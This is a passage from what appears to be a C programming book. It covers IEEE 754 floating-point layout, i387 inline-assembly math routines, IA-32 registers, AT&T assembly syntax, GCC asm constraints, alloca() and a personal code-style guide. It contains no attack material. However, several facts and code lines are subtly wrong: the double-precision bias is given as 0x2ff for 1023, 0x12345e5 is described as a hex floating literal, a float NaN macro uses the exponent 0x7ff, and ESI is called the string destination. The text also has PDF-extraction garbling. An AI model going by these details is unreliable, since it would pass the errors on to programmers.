As a typical scientific constant, the speed of light can be represented, in decimal base,
as
299792.458 meters/second
or equivalently
\(2.99792458 x 10^5\).
In C notation, the latter form would be
2.99792458e5 /* speed of light. */
Here the mantissa is 2.99792458 and the exponent in base 10 is 5.
The new versions of the C Language, starting from C99, i.e. ISO/IEC 9899:1999,
introduced hexadecimal presentation of floating point literals. For example,
0x12345e5
would be equal to
\((1 * 16^4 + 2 * 16^3 + 3 * 16^2 + 4 * 16^1 + 5 * 16^0) * 16^5\)
which would be equal to
105
106 CHAPTER 14. FLOATING POINT NUMERIC PRESENTATION
\((1 * 65536 + 2 * 4096 + 3 * 256 + 4 * 16 + 5 * 1) * 1048576\)
= \((65536 + 8192 + 768 + 64 + 5) * 1048576\)
= \(74565 * 1048576\)
= \(7.818706 * 10^{10}\)
in decimal notation. This is more convenient to write than
78187060000.
14.2 IEEE Floating Point Presentation
The IEEE 754 Standard is the most common representation for floating point values.
14.2.1 Significand; ’Mantissa’
Significand and coefficient are synonymous to [the erroneously used term] mantissa.
The significand in IEEE 754 floating-point presentation doesn’t have an explicit radix
point; instead, it is implicitly assumed to always lie in a certain position within the
significand. The length of the significand determines the precision of numeric presen-
tation.
Note that using the term mantissa for significand is not exactly correct; when using
logarithm tables, mantissa actually means the logarithm of the significand.
14.2.2 Exponent
Scale and characteristic are synonymous to exponent.
It should be sufficient to mention that a floating point value is formed from its presen-
tation with the formula
\(f = significand * base^{exponent}\)
14.2.3 Bit Level
IEEE 754 Floating Point Presentation, at bit-level, works like this
The highest bit is the sign bit; value 1 indicates a negative value.
The next highest bits, the number of which depends on precision, store the expo-
nent.
The low bits, called fraction bits, store the significand.
Let’s illustrate this simply (in most significant bit first) as
(SIGN)|(EXPONENT)|(FRACTION).
14.2. IEEE FLOATING POINT PRESENTATION 107
The sign bit determines the sign of the number, i.e. the sign of the the significand.
The exponent bits encode the exponent; this will be explained in the next, precision-
specific sections.
Wpartis used to denote the width of part in bits.
Conversion equations are given in a mix of mathematical and C notation, most
notably I use the asterisk (’*’) to denote multiplication.
TODO : CONVERSIONS TO AND FROM DECIMAL?
14.2.4 Single Precision
Wvalue is 32,
of which
Wsignis 1
Wexponent is 8
Wsigni ficand is 23.
To get the true exponent, presented in ’offset binary representation’, the value 0x7f
(127) needs to be subtracted from the stored exponent. Therefore, the value 0x7f is
used to store actual zero exponent and the minimum efficient exponent is -126 (stored
as 0x01).
14.2.4.1 Zero Significand
Exponent 0x00 is used to represent 0.0 (zero).
In this case, the relatively uninteresting conversion equation to convert to decimal
(base-10) value is
\((-1)^{sign} * 2^{-126} * 0.significand\).
Exponents 0x01 through 0xfe are used to represent ’normalised values’, i.e. the equa-
tion becomes
\((-1)^{sign} * 2^{exponent - 127} * 1.significand\).
Exponent 0xff is used to represent [signed] infinite values.
14.2.4.2 Non-Zero Significand
Exponent 0x00 is used to represent subnormal values.
Exponents 0x01 through 0xfe represent normalised values, just like with the sig-
nificand of zero.
Exponent 0xff is used to represent special Not-a-Number (NaN) values.
108 CHAPTER 14. FLOATING POINT NUMERIC PRESENTATION
14.2.5 Double Precision
Wvalue is 64,
of which
Wsignis 1
Wexponent is 11
Wsigni ficand is 52.
To get the true exponent, presented in ’offset binary representation’, the value 0x2ff
(1023) needs to be subtracted from the stored exponent.
14.2.5.1 Special Cases
0 (zero) is represented by having both the exponent and fraction all zero-bits.
The exponent 0x7ff is used to present positive and negative infinite values (depending
on the sign bit) when the fraction is zero, and NaNs when it is not.
With these special cases left out, the conversion to decimal becomes
\((-1)^{sign} * 2^{exponent - 1023} x 1.significand\).
14.2.6 Extended Precision
The most common extended precision format is the 80-bit format that originated in the
Intel i8087 mathematics coprocessor. It has been standardised by IEEE.
This extended precision type is usually supported by the C compilers via the long
double type. These values should be aligned to 96-bit boundaries, which doesn’t make
them behave very nicely when 64-bit wide memory access is used; therefore, you may
want to look into using 128-bit long doubles. The Gnu C Compiler (GCC) does allow
this with the
-m128bit-long-double
compiler flag.
Intel SIMD-architectures starting from SSE support the MOVDQA machine instruc-
tion to move aligned 128-bit words between SSE-registers and memory. I tell this as
something interesting to look at for those of you who might be wishing to write, for
example, fast memory copy routines.
14.2.6.1 80-Bit Presentation
Wvalue is 80,
of which
Wsignis 1
Wexponent is 15
Wsigni ficand is 64.
14.3. I387 ASSEMBLY EXAMPLES 109
14.3 i387 Assembly Examples
14.3.1 i387 Header
#ifndef __I387_MATH_H__
#define __I387_MATH_H__
#define getnan(d) \
(dsetexp(d, 0x7ff), dsetmant(d, 0x000fffffffffffff), (d))
#define getsnan(d) \
(dsetsign(d), dsetexp(d, 0x7ff), dsetmant(d, 0x000fffffffffffff), (d))
#define getnanf(f) \
(fsetexp(f, 0x7ff), fsetmant(f, 0x007fffff), (f))
#define getsnanf(f) \
(fsetsign(f), fsetexp(f, 0x7ff), fsetmant(f, 0x007fffff), (f))
#define getnanl(ld) \
(ldsetexp(f, 0x7fff), ldsetmant(ld, 0xffffffffffffffff), (ld))
#define getsnanl(ld) \
(ldsetsign(ld), ldsetexp(ld, 0x7fff), ldsetmant(ld, 0xffffffffffffffff), (ld))
#endif /* __I387_MATH_H__ */
14.3.2 i387 Source
#include <features.h>
#include <fenv.h>
#include <errno.h>
#include <math.h>
#include <i387/math.h>
#include <zero/trix.h>
__inline__ double
sqrt(double x)
{
double retval;
if (isnan(x) || fpclassify(x) == FP_ZERO) {
retval = x;
} else if (!dgetsign(x) && fpclassify(x) == FP_INFINITE) {
retval = dsetexp(retval, 0x7ff);
} else if (x < -0.0) {
errno = EDOM;
feraiseexcept(FE_INVALID);
if (dgetsign(x)) {
retval = getsnan(x);
} else {
retval = getnan(x);
110 CHAPTER 14. FLOATING POINT NUMERIC PRESENTATION
}
} else {
__asm__ __volatile__ ("fldl %0\n" : : "m" (x));
__asm__ __volatile__ ("fsqrt\n");
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (retval));
}
return retval;
}
__inline__ double
sin(double x)
{
double retval;
if (isnan(x)) {
retval = x;
} else if (fpclassify(x) == FP_INFINITE) {
errno = EDOM;
feraiseexcept(FE_INVALID);
if (dgetsign(x)) {
retval = getsnan(x);
} else {
retval = getnan(x);
}
} else {
__asm__ __volatile__ ("fldl %0\n" : : "m" (x));
__asm__ __volatile__ ("fsin\n");
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (retval));
}
return retval;
}
__inline__ double
cos(double x)
{
double retval;
__asm__ __volatile__ ("fldl %0\n" : : "m" (x));
__asm__ __volatile__ ("fcos\n");
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (retval));
return retval;
14.3. I387 ASSEMBLY EXAMPLES 111
}
__inline__ double
tan(double x)
{
double tmp;
double retval;
if (isnan(x)) {
retval = x;
} else if (fpclassify(x) == FP_INFINITE) {
errno = EDOM;
feraiseexcept(FE_INVALID);
if (dgetsign(x)) {
retval = getsnan(x);
} else {
retval = getnan(x);
}
} else {
__asm__ __volatile__ ("fldl %0\n" : : "m" (x));
__asm__ __volatile__ ("fptan\n");
__asm__ __volatile__ ("fstpl %0\n" : "=m" (tmp));
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (retval));
if (dgetsign(retval) && isnan(retval)) {
retval = 0.0;
}
}
return retval;
}
#if ((_BSD_SOURCE) || (_SVID_SOURCE) || _XOPEN_SOURCE >= 600 \
|| (_ISOC99_SOURCE) || _POSIX_C_SOURCE >= 200112L)
__inline__ float
sinf(float x)
{
float retval;
__asm__ __volatile__ ("flds %0\n" : : "m" (x));
__asm__ __volatile__ ("fsin\n");
__asm__ __volatile__ ("fstps %0\n"
"fwait\n"
: "=m" (retval));
return retval;
}
112 CHAPTER 14. FLOATING POINT NUMERIC PRESENTATION
__inline__ float
cosf(float x)
{
float retval;
__asm__ __volatile__ ("flds %0\n" : : "m" (x));
__asm__ __volatile__ ("fcos\n");
__asm__ __volatile__ ("fstps %0\n"
"fwait\n"
: "=m" (retval));
return retval;
}
__inline__ float
tanf(float x)
{
float tmp;
float retval;
if (isnan(x) || fpclassify(x) == FP_ZERO) {
retval = x;
} else if (fpclassify(x) == FP_INFINITE) {
if (dgetsign(x)) {
retval = -M_PI * 0.5;
} else {
retval = M_PI * 0.5;
}
} else {
__asm__ __volatile__ ("flds %0\n" : : "m" (x));
__asm__ __volatile__ ("fptan\n");
__asm__ __volatile__ ("fstps %0\n" : "=m" (tmp));
__asm__ __volatile__ ("fstps %0\n"
"fwait\n"
: "=m" (retval));
if (fgetsign(retval) && isnan(retval)) {
retval = 0.0;
}
}
return retval;
}
__inline__ long double
sinl(long double x)
{
long double retval;
__asm__ __volatile__ ("fldt %0\n" : : "m" (x));
__asm__ __volatile__ ("fsin\n");
__asm__ __volatile__ ("fstpt %0\n"
14.3. I387 ASSEMBLY EXAMPLES 113
"fwait\n"
: "=m" (retval));
return retval;
}
__inline__ long double
cosl(long double x)
{
long double retval;
__asm__ __volatile__ ("fldt %0\n" : : "m" (x));
__asm__ __volatile__ ("fcos\n");
__asm__ __volatile__ ("fstpt %0\n"
"fwait\n"
: "=m" (retval));
return retval;
}
#endif
#if (_GNU_SOURCE)
void
sincos(double x, double *sin, double *cos)
{
__asm__ __volatile__ ("fldl %0\n" : : "m" (x));
__asm__ __volatile__ ("fsincos\n");
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (*cos));
__asm__ __volatile__ ("fstpl %0\n"
"fwait\n"
: "=m" (*sin));
return;
}
void
sincosf(float x, float *sin, float *cos)
{
__asm__ __volatile__ ("flds %0\n" : : "m" (x));
__asm__ __volatile__ ("fsincos\n");
__asm__ __volatile__ ("fstps %0\n"
"fwait\n"
: "=m" (*cos));
__asm__ __volatile__ ("fstps %0\n"
"fwait\n"
: "=m" (*sin));
114 CHAPTER 14. FLOATING POINT NUMERIC PRESENTATION
return;
}
void
sincosl(long double x, long double *sin, long double *cos)
{
__asm__ __volatile__ ("fldt %0\n" : : "m" (x));
__asm__ __volatile__ ("fsincos\n");
__asm__ __volatile__ ("fstpt %0\n"
"fwait\n"
: "=m" (*cos));
__asm__ __volatile__ ("fstpt %0\n"
"fwait\n"
: "=m" (*sin));
return;
}
#endif
Part VII
Machine Level Programming
115

Chapter 15
Machine Interface
15.1 Compiler Specification
15.1.1 <cdecl.h>
#ifndef __CDECL_H__
#define __CDECL_H__
/*
* EMPTY - used to define 0-byte placeholder tables a'la
*
* int tab[EMPTY];
*/
#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
# define EMPTY
#else
# define EMPTY 0
#endif
/*
* ALIGN(a) - align to boundary of a.
* PACK - pack structures, i.e. don't pad for alignment (DIY).
* REGARGS(n) - call with n register arguments.
* ASMLINK - external linkage; pass arguments on stack, not registers
* FASTCALL - use as many register arguments as feasible
* (for system calls).
*/
#define ALIGN(a) __attribute__ ((__aligned__(a)))
#define PACK __attribute__ ((__packed__))
#define REGARGS(n) __attribute__ ((regparm(n)))
#define ASMLINK __attribute__ ((regparm(0)))
#if defined(__i386__)
#define FASTCALL REGARGS(3)
117
118 CHAPTER 15. MACHINE INTERFACE
#endif
#endif /* __CDECL_H__ */
15.2 Machine Definition
15.2.1 <mach.h>
#ifndef __MACH_H__
#define __MACH_H__
#include <stdint.h>
#define NBWORD 4 /* native CPU word size */
#define NBCL 32 /* cacheline size */
#define NBPAGE 4096 /* page size */
#define NADDRBIT 32 /* number of significant address bits in pointers */
#include "cdecl.h"
/* call frame used by the compiler */
struct m_cframe {
uint8_t avar[EMPTY]; /* automatic variables */
int32_t ebp; /* frame pointer to caller */
int32_t eip; /* return address to caller */
uint8_t args[EMPTY]; /* placeholder for function arguments */
} _PACK;
/* stack structure used for interrupt returns (or other use of IRET) */
struct m_iret {
int32_t eip;
int32_t cs;
int32_t eflags;
int32_t esp;
int32_t ss;
};
#endif /* __MACH_H__ */
Chapter 16
IA-32 Register Set
Note that EBP and ESP are usually considered general purpose registers; I deliberately
chose to put them under Special Registers as I feel that’s a better way to think of them.
16.1 General Purpose Registers
Register Special Use
EAX 32-bit return value
EBX data pointer
ECX string and loop counter
EDX I/O pointer, high bits of 64-bit return value
ESI data pointer, string destination
EDI stack data pointer
16.2 Special Registers
Register Purpose
EBP frame pointer
ESP stack pointer
EIP instruction pointer
EFLAGS machine status flags
16.3 Control Registers
Register Purpose
CR3 PDBR (page directory page register)
119
120 CHAPTER 16. IA-32 REGISTER SET
Chapter 17
Assembly
17.1 AT&T vs. Intel Syntax
The very first thing to notice for Intel-based platform assembly programmers is that the
Intel syntax
MNEMONIC dest, src
is not valid using the GNU tools GCC and GNU Assembler;
instead, you need to use AT&T syntax, i.e.
MNEMONIC src, dest
to me, as I’m not an old school assembly programmer, this latter syntax makes more
sense. Your mileage may vary. Either way, as it turns out, C is so flexible and fast
that we actually have to resort to assembly very rarely; mostly we need it for certain
machine specific, usually kernel-level, operations as well as in the extreme case, for
code speedups.
Registers are named starting with a ’%’, e.g.
%eax.
When mixing register names with other arguments which need the ’%’ prefix, you need
to make the register names start with ’%%’.
In AT&T syntax, immediate operands are prefixed with $, e.g.
$0x0fc0
would represent the hexadecimal value that would be 0fc0h in Intel syntax; note that
the h suffix is replaced with the C-style 0x prefix.
One more thing to notice is that AT&T syntax assembly encodes the operand size as a
prefix into the opcode, so instead of
mov al, byte ptr val
you need to write
121
122 CHAPTER 17. ASSEMBLY
movb val, %al
so the
byte ptr, word ptr, and dword ptr
memory operands change to opcode postfixes
'b', 'w', and 'l'.
For some quadword (64-bit) operations you’d use ’q’ and in some rare cases, for 128-
bit double quadword operations, ’dq’.
For memory addressing using base register, Intel syntax uses
'[' and ']'
to enclose the register name; AT&T syntax uses
'(' and ')'.
so the Intel syntax for indirect memory references, which would be
[base + index * scale + displacement]
becomes
displacement(base, index, scale)
in the AT&T syntax.
Now this may all be so confusing that I’d better sum it up with a few examples of the
difference of the Intel and AT&T syntaxes.
17.1.1 Syntax Differences
Intel AT&T
mov eax, 8 movl $8, %eax
mov ebx, abh movl $0xab, %ebx
int 80h int $0x80
mov eax, ebx movl %ebx, %eax
mov eax, [ebx] movl (%ebx), %eax
mov eax, [ebx + 5] movl 5(%ebx), %eax
mov eax, [ecx + 40h] movl 0x40(%ecx), %eax
add eax, [ebx + ecx * 4h] addl (%ebx, %ecx, 0x4), %eax
lea eax, [ebx + edx] leal (%ebx, %edx), %eax
add eax, [ebx + edx * 8h - 40h] addl -0x40(%ebx, %edx, 0x8), %eax
Now let’s take a look at what assembly programs look like.
17.1.2 First Linux Example
This example demonstrates function calls and how to exit a process on Linux using the
exit() system call.
Source Code
17.1. AT&T VS. INTEL SYNTAX 123
# simple example program
# - implements exit(0)
.text
.globl main
main:
call func
call linexit
# dummy function to demonstrate stack interaction of C programs
func:
# compiler and CALL set up return stack frame
pushl %ebp
movl %esp, %ebp
# DO YOUR THING HERE
leave
ret
# simple function to make an exit() function call on Linux.
linexit:
movl $0x00, %ebx # exit code
movl $0x01, %eax # system call number (sys_exit)
int $0x80 # trigger system call
17.1.3 Second Linux Example
Here I implement false in assembly using the exit() system call in a bit different fashion
than in the previous example.
Source Code
# simple educational implementation of false
# - implements exit(1) using the Linux EXIT system call
.text
.globl main
main:
movl $0x01, %eax
movl %eax, sysnum
call lindosys
lindosys:
pushl %ebp
124 CHAPTER 17. ASSEMBLY
movl %esp, %ebp
movl $sysframe, %esp
popl %ebx
popl %ecx
popl %edx
pop %eax
int $0x80
leave
ret
.data
sysframe:
_exitval:
.long 0x00000001 # %ebx
.long 0x00000000 # %ecx
.long 0x00000000 # %edx
sysnum:
.long 0x00000001 # linux system call number
17.1.3.1 Stack Usage
Let us take a closer look at how the code above uses the stack.
There’s a label called sysframe in the DATA segment. As the comments suggest, this
contains the register arguments for triggering a Linux system call with. The actual
system call is triggered with
int \$0x80
In this example, the system call number of 0x01 ( sys_exit ) is passed in sysnum ; this
use is equivalent to assigning a global variable in C code.
Our function lindosys starts with the typical prologue for a function with no automatic
(internal/stack) variables, i.e.
pushl %ebp # push frame pointer
movl %esp, %ebp # save stack pointer
After that, it sets the stack pointer to point to sysframe , pops 3 system calls arguments
into the EBX ,ECX andEDX registers, copies the system call number from sysnum
intoEAX and finally fires the system call by generating an interrupt.
After this, in case of system calls other than exit, it would return to the calling function
with the standard
leave
ret
Function prologue. First, leave sets the stack pointer ESP to the current value of the
frame pointer EBP , then pops the earlier value of frame pointer for the calling function.
17.1. AT&T VS. INTEL SYNTAX 125
After this, retpops the return address and returns.
Note that the _exitval label is used as an alias to store the first system call argument to
be popped from the stack.
TODO : FINISH... REF: http://www.ibiblio.org/gferg/ldp/GCC-Inline-Assembly-HOWTO.html
126 CHAPTER 17. ASSEMBLY
Chapter 18
Inline Assembly
18.1 Syntax
GNU Inline assembly uses the following format
__asm__ (TEMPLATE : OUTPUT : INPUT : CLOBBERED);
TEMPLATE contains the instructions and refers to the optional operands in the OUT-
PUT and INPUT fields. CLOBBERED lists the registers whose values are affected by
executing the instruction in TEMPLATE. As we are going to see a bit later, you can
specify "memory" as a special case in the CLOBBERED field. Also, if the instruc-
tions in TEMPLATE can chance condition code registers, you need to include "cc" in
the CLOBBERED list. Note also that if the code affects memory locations not listed in
the constraints you need to declare your assembly volatile like
__asm__ __volatile__ ("cli\n"); // disable interrupts
/* insert code here */
__asm__ __volatile__ ("sti\n");
the volatile attribute also helps you in the way that the compiler will not try to move
your instructions to try and optimise/reschedule them.
18.1.1 rdtsc()
Let’s see how we can read the timestamp [clock-cycle] counter using the rdtsc assembly
instruction.
#include <stdint.h>
union _rdtsc {
uint32_t u32[2];
uint64_t u64;
};
127
128 CHAPTER 18. INLINE ASSEMBLY
typedef union _rdtsc rdtsc_t;
static __inline__ uint64_t
rdtsc(void)
{
rdtsc_t tsval;
__asm__ ("rdtsc\n"
"movl %%eax, %0\n"
"movl %%edx, %1\n"
: "=m" (tsval.u32[0]),
"=m" (tsval.u32[1])
: /* no INPUT field */
: "eax", "edx");
return tsval.u64;
}
We try to inline this in-header function not visible to other files (declared static ). In-
lining has its own section in part Code Optimisation of this book.
In the listing above, the INPUT field consists of the RDTSC instruction, which takes no
operands, and two movl operations. RDTSC returns the low 32 bits of its 64-bit return
value in EAX and the high 32 bits in EDX. We use a trick with the union to make the
compiler return the combination of these two 32-bit values as a 64-bit one. Chances
are it uses the same two registers and can optimise what our code may seem to do.
Notice how the OUTPUT field uses "=m" ; output operands are prefixed with ’ =’ to de-
note they are assigned/written . The ’m’ means these have to be memory operands (IA-
32 has no 64-bit integer registers). The ’=’ means this an output (write-only) operand.
The CLOBBERED field says we pollute the registers EAX and EDX. All fields except
TEMPLATE are optional. Every optional field that lists more than one operand uses
commas to separate them.
18.2. CONSTRAINTS 129
18.2 Constraints
18.2.1 IA-32 Constraints
Identifier Possible Registers or Values
a %eax, %ax, %al
b %ebx, %bx, %bl
c %ecx, %cx, %cl
d %edx, %dx, %dl
S %esi, %si
D %edi, %di
q registers a, b, c, or d
I constant between 0 and 31 (32-bit shift count)
J constant between 0 and 63 (64-bit shift count)
K 0xff
L 0xffff
M constant between 0 and 3 (lea instruction shift count)
N constant between 0 and 255 (out instruction output value)
f floating point register
t first floating point register (top of stack)
u second floating point register
A register a or d; 64-bit return values with high bits in d and low bits in a
18.2.2 Memory Constraint
The example above used the memory constraint "=m" for output. You would use "m"
for input operands.
18.2.3 Register Constraints
If you want to let the compiler pick a register to use, use "r"(input) or "=r" (output).
As an example, if you don’t care if a register or memory is used, you can use the
combination of "rm" or "=rm" for input and output operands, respectively. The ’r’ in
them might speed the operation up, but leave it out if you want a memory location to
be updated.
18.2.4 Matching Constraints
Sometimes, a single variable serves both as input and output. You can do this by
specifying matching (digit) constraints.
18.2.4.1 Example; incl
__asm__ ("incl %0" : "=a" (reg) : "0" (reg));
130 CHAPTER 18. INLINE ASSEMBLY
18.2.5 Other Constraints
Constraint Rules
m memory operand with any kind of address
o offsettable memory operand; adding a small offset gives valid address
V memory operand which is not offsettable
i immediate integer operand (a constant), including a symbolic constant
n immediate integer operand with a known numeric value
g any general register, memory or immediate integer operand
Use ’n’ instead of ’i’ for operands less than a word wide if the system cannot support
them as assembly-time constants.
18.2.6 Constraint Modifiers
Constraint Meaning
= write only; replaced by output data
& early-clobber operand; modified before instruction finished; cannot be use elsewhere
18.3 Clobber Statements
It is to be considered good form to list registers you clobber in the clobber statement.
Sometimes, you may need to add  ̈memory ̈ to your clobber statement. Use of the
__volatile__ keyword and making assembly operations single statements is often nec-
essary to keep the compiler [optimiser] from doing hazardous things such as reordering
instructions for you.
18.3.1 Memory Barrier
Where memory access needs to be serialised, you can use memory barriers like this
#define membar() \
__asm__ __volatile__ ("" : : : "memory")
Chapter 19
Interfacing with Assembly
19.1 alloca()
alloca() is used to allocate space within the stack frame of the current function. Whereas
this operation is known to be potentially unsafe, I use it to demonstrate how to interface
with assembly code from our C programs.
131
132 CHAPTER 19. INTERFACING WITH ASSEMBLY
19.1.1 Implementation
Here is our header file to declare alloca().
<alloca.h>
#ifndef __ALLOCA_H__
#define __ALLOCA_H__
#include <stddef.h>
#if defined(__GNUC__)
#define alloca(size) __builtin_alloca(size)
#else
void * alloca(size_t size);
#endif
#endif /* __ALLOCA_H__ */
Let us take a look at the x86-64 version of the alloca() routine.
alloca.S
#if defined(__x86_64__) || defined(__amd64__) && !defined(__GNUC__)
.globl alloca
.text 64
/*
* registers at call time
* ----------------------
* rdi - size argument
*
* stack at call time
* ------------------
* return address <- stack pointer
*/
alloca:
subq $8, %rdi // adjust for popped return address
movq %rsp, %rax // copy stack pointer
subq %rdi, %rax // reserve space; return value is in RAX
ret // return
#endif
Notes
After linking with assembled alloca object, alloca can be triggered from C code
just like typical C code by calling alloca() .
19.1. ALLOCA() 133
Our alloca() function is disabled with the GNU C Compiler in favor of __builtin_alloca() .
19.1.2 Example Use
The code snippet below demonstrates calling alloca() from C code.
#include <string.h>
#include <alloca.h>
#define STUFFSIZE 128
int
dostuff(long cmd)
{
int retval;
void *ptr;
/* allocate and initialise stack space */
ptr = alloca(STUFFSIZE);
memset(ptr, 0, STUFFSIZE);
/* process cmd */
retval = stuff(cmd, ptr);
return retval;
}
134 CHAPTER 19. INTERFACING WITH ASSEMBLY
Part VIII
Code Style
135

Chapter 20
A View on Style
20.1 Concerns
Readability
Good code should document what it does reasonably well. Comments should not con-
centrate on how something is done (unless it’s obscure), but rather on what is being
done. Good code is easy to read and understand to a point. It is good to hide the more
obscure things; for example, clever macro tricks should be put in header files not to
pollute the code with hard-to-read parts. It’s highly recommended to have style guides
to keep code from several programmers as consistent as possible.
Maintainability
Good code is easy to modify; for example, to add new features to. Although the C
preprocessor is sometimes considered a bit of a curse, macros (and, of course, functions
for bigger code pieces) are good to avoid code repetition. Try to recognise code patterns
and not repeat them; this way, it’s easier to fix possible bugs as they are only in one
place.
Reusability
Good code should be commented and documented otherwise. Good and precise design
specifications help especially team projects. I suggest splitting projects into logical
parts, defining the interfaces between them, and then implementing the modules. This
kind of approach is called divide and conquer by some. There are also top-down
aspects with this approach (you try to see the big picture and start working towards the
details), but the programmers working on the modules may just as well use bottom-up
at lower level. It’s the end-result, the produced code and its quality, that counts. Keep
in mind software development is art and everyone has their own style which is good to
respect as long as it doesn’t interfere with other parts of projects.
137
138 CHAPTER 20. A VIEW ON STYLE
20.2 Thoughts
To Each Their Own
I feel the need to point out that this section is a personal view on things. Team projects
may have style guides and policies very different from these; individual programmers
tend to have their own preferences. To each their own - consider this section food for
thought.
Simplicity
Good code should be as self-documenting as possible. Readability, clarity, intuitivity,
logicality, and such factors contribute to the quality of code. Simplicity makes things
easy to test, debug, and fix. Errare humanum est; the fewer lines of code you have, the
fewer bugs you are likely to find.
Brevity
To make code faster to type, read, and hopefully grasp, I suggest using relatively brief
identifier names.
Here is a somewhat extreme example
/* 'bad' code commented out */
#if 0
#define pager_get_page_offset(adr) ((uintptr_t)(adr) & 0xfff)
#endif
/* clarified version */
#define pageofs(adr) ((uintptr_t)(adr) & 0xfff)
Note how much easier it is to read the latter one and how little if any information we
hid from the programmers exploring the code.
Mixed Case
As a personal protest at mixing case, let me point out a couple of observations.
Here’s a few different ways for naming a macro like above
It is faster to type and easier to read
pageofs(ptr);
than
page_ofs(ptr);
or
PageOffset(ptr);
or
pageOffset(ptr);
or even
PageOfs(ptr);
20.3. CONVENTIONS 139
You don’t need to hold the shift key for the first one, plus it seems both the most
compact and clearest version to read to me.
As a rule of thumb, the smaller the scope of your variables and functions, the shorter
the names can be.
Consistency
Style is, well, a matter of taste. What ever kind of style you choose, be uniform and
consistent about it. A bit of thought and cleverness will take your code forward a long
way in terms of readability; it’s good for both modifiability and maintainability.
Uniformity
Bigger projects, especially those with several people working on them, benefit mirac-
ulously if all programmers use uniform style. Should you be starting such a project, I
suggest you look into writing a style guide one of the very first things.
20.3 Conventions
K & R
This chapter lists some basic conventions I’m used to follow. Many of these originate
from sources such as Kernighan & Ritchie (the creators of the C language), old UNIX
hackers, and so forth.
20.3.1 Macro Names
Constant Values
One often sees macros named in all uppercase; the C language and UNIX themselves
use this convention repeatedly; SIGABRT, SIGSEGV , SIGILL, EILSEQ, EINTR, EA-
GAIN, etc. all fit my convention of naming constant value macros in all upper case.
Even though I have done so, I tend not to name function-like macros (those with ar-
guments evaluating to a non-constant value) in upper case; instead, I do things such
as
#define SIGMSK 0x3f // signals 0 through 63
#define SIGRTMSK 0x50 // realtime signals; above 31
/* u is unsigned; 0 is not a valid signal number */
#define _sigvalid(u) ((u) && !((u) & ~_SIGMSK))
Note that it’s good form to document what you have done using macros because you
can’t take pointers to macros (could be resolved with wrapper functions).
Comments
Right these days, I’m adopting to the convention of using ’C++ style’ comments (start-
ing with "//") introduced to C in the 1999 ISO standard for end-of-line comments and
comments enclosed between ’/*’ and ’*/’ for comment-only lines. A multiline com-
ment I write like
140 CHAPTER 20. A VIEW ON STYLE
/*
* HAZARD: dirty programming trick below.
*/
#define ptrisaln(ptr, p2) \
(!((uintptr_t)(ptr) & ((p2) - 1)))
Many nice editors such as Emacs can do code highlights, so for example on my setup,
comments show as red text. Such highlight features can also help you debug code;
think of an unclosed comment making a long piece of text red and how easy it makes
to spot the missing comment closure.
20.3.2 Underscore Prefixes
Note that C reserves identifiers whose name begin with an underscore (’_’) for system
use. Read on, though.
An old convention is to prefix names of identifiers with narrow scope (not visible to all
files) with underscores. It’s negotiable if one should use a single underscore or two - or
use them at all. Chances are you should introduce such identifiers within the file or in
a header used in relatively few places. A seasoned hacker may barf on you if you make
them globally visible. =)
20.3.3 Function Names
Even though I’m not a big fan of all object-oriented naming schemes, I do attest seeing
the name of the module (file) where a function is implemented from its name is a good
thing. Whether you should or should not use underscores as word delimiters depends
on what you feel is the best way. ;) However, my vote still goes for brevity; remember
my earlier rant about why I would use pageofs as a macro name over a few alternatives.
20.3.4 Variable Names
I will tell you a few examples of how I’m planning to name variables in my ongoing
kernel project.
As always, try to be brief and descriptive.
Leave the shortest names, such as ’x’, ’y’, ’z’, to automatic variables or, when
there’s little risk of being misunderstood, aggregate fields to avoid namespace
collisions.
Use parameter names for function prototypes in header files.
Use longer and more descriptive names for global variables (if you need to use
them) and function arguments, again to avoid polluting the name space.
Use names starting with ’u’ for unsigned types to make it easier to predict vari-
able behavior, especially when doing more creative arithmetics (e.g., dealing
with overflows by hand) on them.
20.3. CONVENTIONS 141
20.3.5 Abbreviations
I am of the opinion that abbreviations are a good thing when used with care; uniformly
and consistently. However, naming schemes for them vary so much that I thought a bit
of documentation on them would be good.
Examples
142 CHAPTER 20. A VIEW ON STYLE
Abbreviation Explanation
adr address; numerical pointer value
arg argument
atr attribute
aln alignment; addresses
auth authentication; authorisation
blk block; I/O
buf buffer; I/O
cbrt cubic root
cl cache line
con console
cpu central processor unit
ctx context
cur current [item]
decr decrement
fp frame pointer
fpu floating point unit
frm frame
func function; function pointers
gpu graphics processor unit
lst list
mem memory
mod module
nam name
num number; numerical identication
hst host
htab hash table
hw hardware
id [possibly numerical] identification
incr increment
intr interrupt
lg logarithm
mtx mutex (mutual exclusion lock)
ndx index
num number; numerical ID
nod node
pc program counter; instruction pointer
perm permission
phys physical; address
pnt point
ppu physics processor unit
proc process; processor
prot protection
proto protocol
pt part; point
ptr pointer
rbt red-black tree
reg register
ret return
rtn routine
sem semaphore
shm shared memory
sp stack pointer
sqrt square root
stk stack
str string
tab table; array
thr thread
tmp temporary variable
val [probably numerical] value
virt virtual; address
vm virtual memory
20.4. NAMING CONVENTIONS 143
I suggest the laziness of not thinking beyond names such as xyzzy ,foo,bar,foobar ,
etc. for only the very quickest [personal] hacks. There it can be lots of fun though, and
it may be humorous to people with similar hacker mindset. =D
20.4 Naming Conventions
prefix machine-specific names with m_(machine dependent), for example struct
m_iret
prefix floating point variable names with f
name loop iteration counts like i(int) or l(long); for nested loops, use successive
single-letter names ( j,k, etc. or m,nand so forth
use mathematical symbols such as x,y, and zwhere relevant
nfor count variables; alone or as a prefix
name functions and function-like macros descriptively like pagemap() ,pagezero()
prefix file-global entities (ones outside functions) with module (file) or other
logical names; for example, a global page map in mem.c could be memphysmap
ormembufmap
prefix names of program globals (such as structs) with program or some other
conventional name such as korkern in a kernel
name constant-value macros with all upper case like the C language often does
(e.g. EILSEQ )
brevity over complexity; why name a function kernel_alloc_memory when
kmalloc works just as well; is easier to read and actually C-library style/con-
ventional
Here is an example. TODO : better/bigger example
#include "mem.h"
/* initialise i386 virtual address space */
pageinit(uint32_t *map, uint32_t base, uint32_t size);
#define KVMBASE 0xc0000000 // virtual memory base
#define NPDE 1024
uint32_t mempagedir[NPDE];
Globals
Note that use of globals entities (those beyond file scope), should generally be avoided.
When you have to do it, consider using file-scope structures which you put members
